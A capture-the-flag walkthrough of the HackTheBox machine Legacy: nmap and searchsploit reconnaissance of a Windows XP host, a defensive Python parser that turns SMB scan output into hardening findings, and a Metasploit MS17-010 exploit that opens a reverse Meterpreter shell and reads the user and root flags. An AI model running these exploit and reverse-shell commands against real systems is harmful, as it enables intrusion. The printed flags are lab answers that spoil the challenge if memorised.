HackTheBox Walkthrough - Legacy
Target machine: Legacy.
Directory: /home/kali/Legacy
Time spent on it: 30 min
Template changelog
Version 1.0 - Sep. 2022: creation of the base template
Version 1.1 - Oct. 2022: added the nmap scans and the basic commands
Version 1.2 - Nov. 2022: added redirections to avoid error output, and the domain to be compliant with TryHackMe
Version 1.3 - Nov. 2022: added the UDP scan and the export to searchsploit
Phase 1: Reconnaissance
┌──(kali㉿kali)-[~]
└─$
name="Legacy"
repository="/home/kali/$name"
ip="10.10.10.4"
domain='htb'
# Create the working directory if it does not exist yet and move into it
mkdir -p "$repository" 2>/dev/null && cd "$repository"
# Register the target in /etc/hosts (short name and domain-qualified name) only once
grep "$ip $name ${name}.${domain}" /etc/hosts >/dev/null || echo "$ip $name ${name}.${domain}" | sudo tee -a /etc/hosts
# Quick scan of the 1000 most common TCP ports, then a full TCP scan whose XML output feeds searchsploit
nmap -Pn -A -T5 --top-ports 1000 -oN "$repository/txt" "$ip"
nmap -Pn -A -T5 -p - -oN "$repository/full" -oX "$repository/sploitable" "$ip"
searchsploit --nmap "$repository/sploitable"
# Same thing for UDP (raw sockets, hence sudo)
sudo nmap -Pn -A -T5 -sU -p - -oN "$repository/udp" -oX "$repository/udploitable" "$ip"
searchsploit --nmap "$repository/udploitable"
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-04 17:54 CET
Nmap scan report for Legacy (10.10.10.4)
Host is up (0.019s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 005056b9a49a (VMware)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2022-12-09T20:52:38+02:00
|_clock-skew: mean: 5d00h57m40s, deviation: 1h24m51s, median: 4d23h57m40s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.40 seconds
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-04 17:55 CET
Nmap scan report for Legacy (10.10.10.4)
Host is up (0.017s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_clock-skew: mean: 5d00h57m40s, deviation: 1h24m51s, median: 4d23h57m40s
|_smb2-time: Protocol negotiation failed (SMB2)
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 005056b9a49a (VMware)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2022-12-09T20:53:13+02:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.30 seconds
[i] SearchSploit's XML mode (without verbose enabled). To enable: searchsploit -v --xml...
[i] Reading: '/home/kali/Legacy/sploitable'
[i] /usr/bin/searchsploit -t msrpc
[i] /usr/bin/searchsploit -t microsoft windows rpc
------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------ ---------------------------------
Microsoft Windows - 'Lsasrv.dll' RPC Remote Buffer Overflow (MS04-011) | windows/remote/293.c
Microsoft Windows - 'RPC DCOM' Long Filename Overflow (MS03-026) | windows/remote/100.c
Microsoft Windows - 'RPC DCOM' Remote (1) | windows/remote/69.c
Microsoft Windows - 'RPC DCOM' Remote (2) | windows/remote/70.c
Microsoft Windows - 'RPC DCOM' Remote (Universal) | windows/remote/76.c
Microsoft Windows - 'RPC DCOM' Remote Buffer Overflow | windows/remote/64.c
Microsoft Windows - 'RPC DCOM' Scanner (MS03-039) | windows/remote/97.c
Microsoft Windows - 'RPC DCOM2' Remote (MS03-039) | windows/remote/103.c
Microsoft Windows - DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption | windows/dos/3453.py
Microsoft Windows - DCOM RPC Interface Buffer Overrun | windows/remote/22917.txt
Microsoft Windows - DNS RPC Remote Buffer Overflow (2) | windows/remote/3746.txt
Microsoft Windows - Net-NTLMv2 Reflection DCOM/RPC (Metasploit) | windows/local/45562.rb
Microsoft Windows - Net-NTLMv2 Reflection DCOM/RPC (Metasploit) | windows/local/45562.rb
Microsoft Windows 10 1903/1809 - RPCSS Activation Kernel Security Callback Privilege Escalation | windows/local/47135.txt
Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow | windows/remote/5.c
Microsoft Windows 8.1 - DCOM DCE/RPC Local NTLM Reflection Privilege Escalation (MS15-076) | windows/local/37768.txt
Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065) (1) | windows/remote/4745.cpp
Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065) (2) | windows/remote/4934.c
Microsoft Windows Server 2000 - RPC DCOM Interface Denial of Service | windows/dos/61.c
Microsoft Windows Server 2000 SP4 - DNS RPC Remote Buffer Overflow | windows/remote/3737.py
Microsoft Windows XP/2000 - 'RPC DCOM' Remote (MS03-026) | windows/remote/66.c
Microsoft Windows XP/2000 - RPC Remote Non Exec Memory | windows/remote/117.c
Microsoft Windows XP/2003 - RPCSS Service Isolation Privilege Escalation | windows/local/32892.txt
------------------------------------------------------------------------------------------------ ---------------------------------
[i] /usr/bin/searchsploit -t netbios ssn
[i] /usr/bin/searchsploit -t microsoft windows netbios ssn
[i] /usr/bin/searchsploit -t microsoft ds
We end up with almost the same configuration as for Eternal Blue. And for good reason: that one would work here as well. But that is too easy and not the initial goal of this box, so I looked at the write-up to get a slightly more visible lead: it would be another CVE that also exploits SMB. Let's search for all of that on the internet: we find this. ~~Incidentally, and no doubt much more interesting, there is also an article on how to exploit the same flaw by hand~~ It is in fact a lab on Eternal Blue >.>
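The SMB host-script lines in the scan above are exactly what a defender would triage on this host. As an added example (not part of this walkthrough), the following Python parses those nmap lines into hardening findings; the sample reproduces the page's own scan output with nmap's real indentation restored, and the EOL_OS list is an assumption maintained by hand.

```python
import re

# Constructed sample: the SMB host-script lines from the scan above, with nmap's real
# indentation restored (the page's copy of the output lost it).
SAMPLE = """\
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 005056b9a49a (VMware)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|_  System time: 2022-12-09T20:52:38+02:00
| smb-security-mode:
|   account_used: guest
|_  message_signing: disabled (dangerous, but default)
"""
# Assumption: hand-maintained list of Windows releases that are out of vendor support.
EOL_OS = ("windows 2000", "windows xp", "windows server 2003", "windows vista")
# One NSE output line: "|" or "|_", indentation, "key:", value.
LINE = re.compile(r"^\|_?( *)([^:]+?):\s*(.*)$")

def parse_host_scripts(text):
    """Map each script name to its key/value lines; a one-line script maps to {'_': value}."""
    scripts, current = {}, None
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        indent, key, value = len(m.group(1)), m.group(2).strip(), m.group(3).strip()
        if indent < 2:          # "| script:" or "|_script: value" opens a new script
            current = key
            scripts[current] = {"_": value} if value else {}
        elif current:           # "|   key: value" belongs to the open script
            scripts[current][key.lower()] = value
    return scripts

def smb_findings(text):
    """Turn the parsed SMB scripts into hardening findings a defender would act on."""
    s = parse_host_scripts(text)
    sec, osd = s.get("smb-security-mode", {}), s.get("smb-os-discovery", {})
    findings = []
    if sec.get("message_signing", "").startswith("disabled"):
        findings.append("SMB signing disabled: relay/tampering possible, require signing")
    if sec.get("account_used") == "guest":
        findings.append("guest session accepted: restrict anonymous SMB access")
    if "negotiation failed" in s.get("smb2-time", {}).get("_", ""):
        findings.append("no SMB2: host only speaks SMBv1, isolate or retire it")
    os_name = osd.get("os", "")
    if any(eol in os_name.lower() for eol in EOL_OS):
        findings.append(f"end-of-life OS '{os_name}': out of vendor support, retire it")
    return findings
```

Run on the sample it returns four findings; run on a host that reports `message_signing: required` and speaks SMB2 it returns none.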
Phase 2: Analysis
I told myself I would try the attack by hand. After all, if I wanted it to go fast, I would have used Eternal Blue and learned nothing new. So we start by re-running the nmap scan with the --script vuln option (added to the template). We then get the following message:
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
I stopped there because I understood afterwards that it was not the same flaw at all …
Phase 3: User
Well, with metasploit it is extremely simple:
┌──(kali㉿kali)-[~/Legacy]
└─$ localip=`ip a | grep tun0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
┌──(kali㉿kali)-[~/Legacy]
└─$ msfconsole -qx "use exploit/windows/smb/ms17_010_psexec; set RHOSTS $ip ; set LHOST $localip; run"
[*] Using configured payload windows/meterpreter/reverse_tcp
[*] Started reverse TCP handler on 10.10.14.5:4444
[*] 10.10.10.4:445 - Target OS: Windows 5.1
[*] 10.10.10.4:445 - Filling barrel with fish... done
[*] 10.10.10.4:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 10.10.10.4:445 - [*] Preparing dynamite...
[*] 10.10.10.4:445 - [*] Trying stick 1 (x86)...Boom!
[*] 10.10.10.4:445 - [+] Successfully Leaked Transaction!
[*] 10.10.10.4:445 - [+] Successfully caught Fish-in-a-barrel
[*] 10.10.10.4:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 10.10.10.4:445 - Reading from CONNECTION struct at: 0x86478230
[*] 10.10.10.4:445 - Built a write-what-where primitive...
[+] 10.10.10.4:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.10.10.4:445 - Selecting native target
[*] 10.10.10.4:445 - Uploading payload... osjRMtyb.exe
[*] 10.10.10.4:445 - Created \osjRMtyb.exe...
[+] 10.10.10.4:445 - Service started successfully...
[*] Sending stage (175686 bytes) to 10.10.10.4
[*] 10.10.10.4:445 - Deleting \osjRMtyb.exe...
[*] Meterpreter session 3 opened (10.10.14.5:4444 -> 10.10.10.4:1034) at 2022-12-04 18:16:21 +0100
meterpreter > cd /Users
[-] stdapi_fs_chdir: Operation failed : The system cannot find the file specified.
meterpreter > cd /
meterpreter > ls
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2017-03-16 07:07:20 +0100 Documents and Settings
[...]
meterpreter > cd Documents\ and\ Settings
meterpreter > ls
Listing: C:\Documents and Settings
==================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2017-03-16 07:07:21 +0100 Administrator
040777/rwxrwxrwx 0 dir 2017-03-16 06:33:42 +0100 john
[...]
meterpreter > cat Administrator/Desktop/root.txt
993442d258b0e0ec917cae9e695d5713
meterpreter > cat john/Desktop/user.txt
e69af0e4f443de7e36876fda4ec7644f
Phase 4: Privilege escalation
Here again, no PE.
Summary
Note that it was Documents & Settings on XP!
Takeaways
SMB is evil.
The --script vuln option of nmap is not enabled by default with -A. I added it to my templates.